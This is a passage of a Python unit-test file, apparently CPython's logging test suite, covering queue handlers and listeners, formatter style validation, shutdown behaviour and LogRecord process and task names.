r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
@threading_helper.requires_working_threading()
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
@threading_helper.requires_working_threading()
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class AssertErrorMessage:
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises((), *args, **kwargs)
except exception as e:
self.assertEqual(message, str(e))
class FormatterTest(unittest.TestCase, AssertErrorMessage):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
'custom': {
'custom': 1234
}
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
# Testing when ValueError being raised from incorrect format
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid format: invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"invalid format: bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: expected '}' before end of string",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: Single '}' encountered in format string",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_defaults_parameter(self):
fmts = ['%(custom)s %(message)s', '{custom} {message}', '$custom $message']
styles = ['%', '{', '$']
for fmt, style in zip(fmts, styles):
f = logging.Formatter(fmt, style=style, defaults={'custom': 'Default'})
r = self.get_record()
self.assertEqual(f.format(r), 'Default Message with 2 placeholders')
r = self.get_record("custom")
self.assertEqual(f.format(r), '1234 Message with 2 placeholders')
# Without default
f = logging.Formatter(fmt, style=style)
r = self.get_record()
self.assertRaises(ValueError, f.format, r)
# Non-existing default is ignored
f = logging.Formatter(fmt, style=style, defaults={'Non-existing': 'Default'})
r = self.get_record("custom")
self.assertEqual(f.format(r), '1234 Message with 2 placeholders')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
def test_default_msec_format_none(self):
class NoMsecFormatter(logging.Formatter):
default_msec_format = None
default_time_format = '%d/%m/%Y %H:%M:%S'
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 123, utc)
r.created = time.mktime(dt.astimezone(None).timetuple())
f = NoMsecFormatter()
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '21/04/1993 08:03:00')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
self.assertRaises(ValueError, logging.disable, "doesnotexists")
class _NotAnIntOrString:
pass
self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())
logging.disable("WARN")
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
def test_logging_at_shutdown(self):
# bpo-20037: Doing text I/O late at interpreter shutdown must not crash
code = textwrap.dedent("""
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()
""")
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_logging_at_shutdown_open(self):
# bpo-26789: FileHandler keeps a reference to the builtin open()
# function to be able to open or reopen the file during Python
# finalization.
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
code = textwrap.dedent(f"""
import builtins
import logging
class A:
def __del__(self):
logging.error("log in __del__")
# basicConfig() opens the file, but logging.shutdown() closes
# it at Python exit. When A.__del__() is called,
# FileHandler._open() must be called again to re-open the file.
logging.basicConfig(filename={filename!r}, encoding="utf-8")
a = A()
# Simulate the Python finalization which removes the builtin
# open() function.
del builtins.open
""")
assert_python_ok("-c", code)
with open(filename, encoding="utf-8") as fp:
self.assertEqual(fp.read().rstrip(), "ERROR:root:log in __del__")
def test_recursion_error(self):
# Issue 36272
code = textwrap.dedent("""
import logging
def rec():
logging.error("foo")
rec()
rec()
""")
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
def test_get_level_names_mapping(self):
mapping = logging.getLevelNamesMapping()
self.assertEqual(logging._nameToLevel, mapping) # value is equivalent
self.assertIsNot(logging._nameToLevel, mapping) # but not the internal data
new_mapping = logging.getLevelNamesMapping() # another call -> another copy
self.assertIsNot(mapping, new_mapping) # verify not the same object as before
self.assertEqual(mapping, new_mapping) # but equivalent in value
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
@staticmethod # pickled as target of child process in the following test
def _extract_logrecord_process_name(key, logMultiprocessing, conn=None):
prev_logMultiprocessing = logging.logMultiprocessing
logging.logMultiprocessing = logMultiprocessing
try:
import multiprocessing as mp
name = mp.current_process().name
r1 = logging.makeLogRecord({'msg': f'msg1_{key}'})
# https://bugs.python.org/issue45128
with support.swap_item(sys.modules, 'multiprocessing', None):
r2 = logging.makeLogRecord({'msg': f'msg2_{key}'})
results = {'processName' : name,
'r1.processName': r1.processName,
'r2.processName': r2.processName,
}
finally:
logging.logMultiprocessing = prev_logMultiprocessing
if conn:
conn.send(results)
else:
return results
def test_multiprocessing(self):
support.skip_if_broken_multiprocessing_synchronize()
multiprocessing_imported = 'multiprocessing' in sys.modules
try:
# logMultiprocessing is True by default
self.assertEqual(logging.logMultiprocessing, True)
LOG_MULTI_PROCESSING = True
# When logMultiprocessing == True:
# In the main process processName = 'MainProcess'
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
results = self._extract_logrecord_process_name(1, LOG_MULTI_PROCESSING)
self.assertEqual('MainProcess', results['processName'])
self.assertEqual('MainProcess', results['r1.processName'])
self.assertEqual('MainProcess', results['r2.processName'])
# In other processes, processName is correct when multiprocessing in imported,
# but it is (incorrectly) defaulted to 'MainProcess' otherwise (bpo-38762).
import multiprocessing
parent_conn, child_conn = multiprocessing.Pipe()
p = multiprocessing.Process(
target=self._extract_logrecord_process_name,
args=(2, LOG_MULTI_PROCESSING, child_conn,)
)
p.start()
results = parent_conn.recv()
self.assertNotEqual('MainProcess', results['processName'])
self.assertEqual(results['processName'], results['r1.processName'])
self.assertEqual('MainProcess', results['r2.processName'])
p.join()
finally:
if multiprocessing_imported:
import multiprocessing
def test_optional(self):
NONE = self.assertIsNone
NOT_NONE = self.assertIsNotNone
r = logging.makeLogRecord({})
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
NONE(r.taskName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
log_asyncio_tasks = logging.logAsyncioTasks
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
logging.logAsyncioTasks = False
r = logging.makeLogRecord({})
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
NONE(r.taskName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
logging.logAsyncioTasks = log_asyncio_tasks
async def _make_record_async(self, assertion):
r = logging.makeLogRecord({})
assertion(r.taskName)
@support.requires_working_socket()
def test_taskName_with_asyncio_imported(self):
try:
make_record = self._make_record_async
with asyncio.Runner() as runner:
logging.logAsyncioTasks = True
runner.run(make_record(self.assertIsNotNone))
logging.logAsyncioTasks = False
